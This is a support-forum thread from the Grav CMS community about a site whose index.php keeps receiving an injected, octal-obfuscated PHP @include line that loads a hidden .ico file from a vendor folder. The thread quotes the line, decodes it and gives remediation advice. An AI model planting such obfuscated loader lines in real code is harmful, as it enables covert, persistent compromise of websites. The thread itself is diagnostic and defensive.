Skip to content
Grav 2.0 is officially stable. Read the announcement →

Community guidelines

Please keep discussions civil and on-topic. Repeated violations may lead to a temporary ban.

Log in Register
Support

Gibberish in index.php

first-time

Solved by Ole Vik View solution

Started by Cactus 8 years ago · 8 replies · 1111 views
8 years ago

Hello!
Just started using Grav to build a site for a client and I've been having a weird recurring issue. Every day or so I get an error 500 while trying to access the site, and I've managed to trace it to some weird code that keeps getting added to index.php, right before the credits and namespace declaration:

TXT
<?php

/272b5/

@include "\057srv\057www\057sea\154ete\141m6.\143om/\160ubl\151c_h\164ml/\166end\157r/c\157mpo\163er/\143a-b\165ndl\145/.4\063fa9\143cd.\151co";

/272b5/

I delete it and the site works, but it keeps coming back every day. It's slightly different code every day too. I'm not sure what's going on. Here's a list of plugins I have installed:
http://bit.ly/2J9BY05

Would love any advice on how to solve this 🙂

last edited 07/10/18 by Cactus
8 years ago

My first thought is that your server is compromised. Nothing should be modifying your index.php file.

If you investigate and find it's via a Grav vulnerability, please report it using the process described in the docs (email to [email protected] in first instance).

Good luck.

8 years ago

I agree with Hughbris. It looks like code that is deliberately obfuscated, which there is rarely a legitimate reason to do so. The encoding isn't consistent, but it looks like it's trying to include a composer bundle, which could likely be malicious code.

8 years ago

Deobfuscating the code online renders:

@include /srv/www/sealeteam6.com/public_html/vendor/composer/ca-bundle/.43fa9ccd.ico;

Does this ring a bell?

👍 1
last edited 07/11/18 by pamtbaau
8 years ago Solution

This is a common injection-attack, that typically stems from compromised access to the server. I've seen it most commonly with regular FTP-credentials being sniffed in transport, and easily remedied by enforcing all server-access through SFTP with key-auth. None of your plugins have known flaws that would allow this, nor does Grav Core, so start by purging all accounts with server-access (through FTP, SSH, other scripts that may allow direct-file editing) and reinstall Grav with plugins. Enforce a strict policy of FTP through SFTP with a key-pair for access, and limit the amount of users with this to the bare minimum.

The code tries to have the server execute remote scripts, typically hidden behind "regular" files, which composer/ca-bundle is, but a normal installation of ca-bundle does not include .43fa9ccd.ico -- showing that it was placed there maliciously. Further, you should not be using or allow root access, and ideally keep executable files -- such as PHP -- locked behind permissions so they are not editable by general server-users.

👍 2
8 years ago

@pamtbaau haha, using bacon ipsum for filler text.

@OleVik I use RSA keys for my server with root disabled. Maybe I have a bigger problem.

Thanks for the insights

8 years ago

@cactus Don't forget to come back for saying us if you solve your problem and how. I'm interested in knowing how you fixed it.

8 years ago

I solved it by moving servers. I neglected to keep my existing server up to date for 4 years, haha. Been putting it off for a while but now I have an even faster and more secure stack.

👍 1
8 years ago

That is a pretty big factor, there's endless patches to solve security-issues allowing unwarranted access in operating systems, as well as for PHP and the hardware-level (most recently Spectre and Meltdown). It's a benefit of shared hosting that the good ones typically keep up-to-date and on-top of things. On self-managed servers/VPS, we'll have to be ever more vigilant ourselves.

👍 1

Suggested topics

Topic Participants Replies Views Activity
Multisite in subdirectory
Support · by Thomas, 1 week ago
2 57 14 hours ago
How to listen for GET requests instead of POST requests?
Support · by Anna, 3 days ago
2 65 17 hours ago
Twig not processing in 2.0.0
Support · by Justin Young, 18 hours ago
1 33 18 hours ago
Form: GRAV.Yes translation key
Support · by Duc , 1 week ago
2 68 5 days ago
Installing Grav on Windows 11
Support · by Colin Hume, 1 week ago
2 60 6 days ago